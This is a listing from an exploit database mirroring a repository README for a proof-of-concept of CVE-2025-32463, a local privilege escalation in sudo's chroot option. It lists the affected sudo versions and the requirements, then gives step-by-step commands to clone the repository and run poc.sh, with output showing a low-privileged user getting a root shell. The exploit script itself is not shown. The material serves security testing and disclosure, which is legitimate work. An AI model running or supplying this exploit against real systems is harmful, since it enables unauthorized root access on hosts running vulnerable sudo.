Exploit for CVE-2025-32463

Name: Exploit for CVE-2025-32463
Rating: 5 (196 reviews)
2025-07-04 | CVSS 9.3
## https://sploitus.com/exploit?id=DEF8C6B3-6A5E-5DCE-93CD-AF750CD81566
# CVE-2025-32463 – Sudo EoP Exploit (PoC) with precompiled .so

This repository contains a proof-of-concept (PoC) exploit for **CVE-2025-32463**, a local privilege escalation vulnerability in `sudo` discovered by Rich Mirch.

## Credit

https://github.com/kh4sh3i/CVE-2025-32463

## ⚠️ Disclaimer

This PoC is for **educational and authorized testing purposes only**. Do not use this code on systems you do not own or have explicit permission to assess.

---

## 🔧 Requirements

- sudo with chroot support (-R): version 1.9.14 to 1.9.17
- [nsswitch](https://en.wikipedia.org/wiki/Name_Service_Switch) enabled

## 🚀 How to run the POC

    git clone https://github.com/zinzloun/CVE-2025-32463.git
    cd CVE-2025-32463
Check if the current user has low privileges

    :~/CVE-2025-32463$ id
    uid=1001(poc) gid=1001(poc) groups=1001(poc),100(users)
Check requirements

    :~/CVE-2025-32463$ sudo --version
    Sudo version 1.9.15p5
    ...
    :~/CVE-2025-32463$ ls -al /etc/nsswitch.conf
    -rw-r--r-- 1 root root 526 Feb 16 20:57 /etc/nsswitch.conf
Run the exploit
        
    :~/CVE-2025-32463$ chmod +x poc.sh && ./poc.sh
    woot!
    root@ubutes01:/# id
    uid=0(root) gid=0(root) groups=0(root),100(users),1001(poc)